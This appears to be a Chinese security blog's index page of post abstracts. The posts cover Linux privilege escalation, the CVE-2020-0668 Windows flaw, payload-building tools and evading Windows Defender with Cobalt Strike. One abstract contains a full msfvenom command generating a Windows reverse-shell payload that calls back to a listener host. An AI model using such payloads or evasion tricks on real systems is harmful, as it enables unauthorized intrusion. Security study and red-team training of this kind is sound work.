摘要:
这里是Linux环境中特权升级的最常用技术: 内核 突破 以root身份运行的程序 安装的软件 弱密码 /重用密码 /纯文本密码 内部服务 Suid 配置错误 滥用sudo权利 由root调用的世界可写脚本 路径配置错误 Cronjobs 卸载的文件系统 内核利用 脏牛利用 此漏洞最初是通过HTTP 阅读全文
摘要:
MSFVENOM SHELLCODE生成 通用Shellcode msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e generic/none Wind 阅读全文
摘要:
Axer-使用Msfvenom自动创建有效负载的工具 该axer将替换为有效的手动操作msfvenom,设置更容易和快了很多。 AXER可以让您选择平台,格式,编码器,与另一个文件绑定以及许多其他功能: 下载The-Axer https://github.com/ceh-tn/The-Axer 阅读全文
摘要:
CVE-2020-0668-Windows服务跟踪中的普通特权升级错误 在这里中,我将讨论在Windows Service跟踪中发现的任意文件移动漏洞。从我的测试来看,它影响了从Vista到10的所有Windows版本,但它可能更旧,因为XP中已经存在此功能。 服务跟踪是一项旧功能,我可以转换到Wi 阅读全文
摘要:
Cobalt Strike – Bypassing Windows Defender 混淆处理 对于所有红色团队成员来说,在交付有效的替代品同时又不拖延延展组织的所有风吹草动始终是一个挑战。就像所有其他安全解决方案一样,Windows Defender在检测由Cobalt Strike等工具生成的通 阅读全文
该文被密码保护。 阅读全文